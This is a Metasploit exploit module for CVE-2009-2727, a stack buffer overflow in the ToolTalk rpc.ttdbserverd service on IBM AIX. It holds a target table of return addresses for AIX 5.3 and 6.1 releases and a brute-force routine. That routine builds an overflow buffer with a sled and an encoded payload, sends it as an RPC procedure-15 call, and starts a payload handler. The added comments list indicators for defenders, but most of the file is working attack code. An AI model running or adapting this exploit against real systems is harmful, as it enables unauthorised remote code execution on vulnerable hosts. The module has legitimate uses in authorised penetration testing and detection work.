##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2009-2727 / OSVDB 55151: a stack buffer overflow in
# _tt_internal_realpath of the ToolTalk database server (rpc.ttdbserverd) on AIX.
#
# Operational characteristics declared in 'Notes' below (useful to defenders
# triaging a suspected use of this module):
#   - Stability CRASH_SERVICE_RESTARTS: a missed return address is expected to
#     crash rpc.ttdbserverd; the Brute mixin keeps retrying with new 'Ret'
#     values, so repeated ttdbserverd crashes/restarts are the primary symptom.
#   - SideEffects IOC_IN_LOGS: attempts are expected to leave evidence in logs.
#   - Reliability REPEATABLE_SESSION.
#
# The Brute mixin presumably calls brute_exploit once per candidate 'Ret'
# between each target's 'Bruteforce' 'Start' and 'Stop', stepping by 'Step'
# (the mixin itself is not visible here — confirm against Msf::Exploit::Brute).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SunRPC
  include Msf::Exploit::Brute

  # Module metadata: name, references, payload constraints and the per-AIX-release
  # target table. Each target carries a base 'Ret' and 'Addr1', the 'AIX' version
  # string that brute_exploit copies into datastore['AIX'] before generating the
  # payload, and a 'Bruteforce' range. The two "Debug" targets use placeholder
  # addresses (0xaabbccdd / 0xddccbbaa) with Start == Stop, i.e. a single attempt.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
        'Description' => %q{
          This module exploits a buffer overflow vulnerability in _tt_internal_realpath
          function of the ToolTalk database server (rpc.ttdbserverd).
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
        'Platform' => [ 'aix' ],
        'References' => [
          [ 'CVE', '2009-2727'],
          [ 'OSVDB', '55151' ]
        ],
        'Payload' => {
          # NUL terminates the path string the server copies, so it cannot appear
          # in the encoded payload.
          'BadChars' => "\x00"
        },
        'Targets' => [
          [
            'IBM AIX Version 6.1.4',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099430 + 4096,
              'Addr1' => 0x2ff1ff50 - 8192,
              'AIX' => '6.1.4',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099430 - 8192 },
                'Stop' => { 'Ret' => 0x20099430 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.3',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.3',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.2',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.2',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.1',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 6.1.0',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20099280 + 4096,
              'Addr1' => 0x2ff1ffd0 - 8192,
              'AIX' => '6.1.0',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20099280 - 8192 },
                'Stop' => { 'Ret' => 0x20099280 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            # Combined 5.3.x target; note it reuses the 5.3.9 addresses and
            # reports itself as '5.3.9' to the payload generator.
            'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096ba0 + 4096,
              'Addr1' => 0x2ff1ff14 - 8192,
              'AIX' => '5.3.9',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096ba0 - 8192 },
                'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.10',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096bf0 + 4096,
              'Addr1' => 0x2ff1ff14 - 8192,
              'AIX' => '5.3.10',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096bf0 - 8192 },
                'Stop' => { 'Ret' => 0x20096bf0 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.9',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096ba0 + 4096,
              'Addr1' => 0x2ff1ff14 - 8192,
              'AIX' => '5.3.9',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096ba0 - 8192 },
                'Stop' => { 'Ret' => 0x20096ba0 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.8',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096c10 + 4096,
              'Addr1' => 0x2ff1ff98 - 8192,
              'AIX' => '5.3.8',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096c10 - 8192 },
                'Stop' => { 'Ret' => 0x20096c10 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            'IBM AIX Version 5.3.7',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0x20096c10 + 4096,
              'Addr1' => 0x2ff1ff98 - 8192,
              'AIX' => '5.3.7',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x20096c10 - 8192 },
                'Stop' => { 'Ret' => 0x20096c10 + 8192 },
                'Step' => 1024
              }
            }
          ],
          [
            # Debug target: placeholder addresses, single attempt (Start == Stop).
            'Debug IBM AIX Version 6.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0xaabbccdd,
              'Addr1' => 0xddccbbaa,
              'AIX' => '6.1.4',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 1024
              }
            }
          ],
          [
            # Debug target: placeholder addresses, single attempt (Start == Stop).
            'Debug IBM AIX Version 5.3',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'Ret' => 0xaabbccdd,
              'Addr1' => 0xddccbbaa,
              'AIX' => '5.3.10',
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 1024
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-06-17',
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SERVICE_RESTARTS ],
          'SideEffects' => [ IOC_IN_LOGS ]
        }
      )
    )
  end

  # One brute-force attempt. Called by the Brute mixin with a +brute_target+ hash
  # whose 'Ret' is the return address candidate for this attempt; every other
  # target parameter is read from +target+.
  #
  # Network behaviour visible on the wire: a SunRPC connection is created with
  # sunrpc_create('tcp', 100083, 1) (transport, RPC program number and version,
  # presumably — the SunRPC mixin is not visible here) and a single call to
  # procedure 15 is sent, then the connection is torn down and the handler is
  # started. Defenders can therefore look for TCP RPC traffic to program 100083
  # with oversized procedure-15 requests, in addition to the service crashes
  # declared in 'Notes'.
  #
  # Returns nothing meaningful; RPC timeouts and EOF on the connection are
  # swallowed (see the rescue clauses).
  def brute_exploit(brute_target)
    # Generate the payload once and cache it across attempts. datastore['AIX']
    # is set from the target first so the AIX-specific payload generator sees
    # the release string the target table declares.
    if !@aixpayload
      datastore['AIX'] = target['AIX']
      @aixpayload = regenerate_payload.encoded
    end

    print_status('Trying to exploit rpc.ttdbserverd with address 0x%08x...' % brute_target['Ret'])

    begin
      sunrpc_create('tcp', 100083, 1)

      # Leading padding differs between the 6.x and 5.3.x targets (alignment of
      # the fields that follow).
      if target['AIX'] =~ /6\./
        buf = 'A'
      else
        buf = 'AA'
      end

      # Big-endian 32-bit words: the target's 'Addr1' repeated, then this
      # attempt's 'Ret' candidate repeated.
      buf << [target['Addr1']].pack('N') * (1022 + 8)
      buf << [brute_target['Ret']].pack('N') * 32

      # Trailing padding, again version-dependent.
      if target['AIX'] =~ /6\./
        buf << 'AAA'
      else
        buf << 'AA'
      end

      # Fixed 4-byte filler repeated ahead of the encoded payload.
      buf << "\x7f\xff\xfb\x78" * 1920
      buf << @aixpayload
      # Wrap the whole buffer as an XDR-encoded request body for procedure 15.
      buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)

      print_status('Sending procedure 15 call message...')
      sunrpc_call(15, buf)

      sunrpc_destroy
      handler
    # A timeout or a dropped connection is expected while brute-forcing
    # (the service is declared to crash on a miss), so both are ignored and
    # the mixin moves on to the next 'Ret' candidate. The commented-out
    # print_error calls are left for debugging.
    rescue Rex::Proto::SunRPC::RPCTimeout
      # print_error('RPCTimeout')
    rescue EOFError
      # print_error('EOFError')
    end
  end
end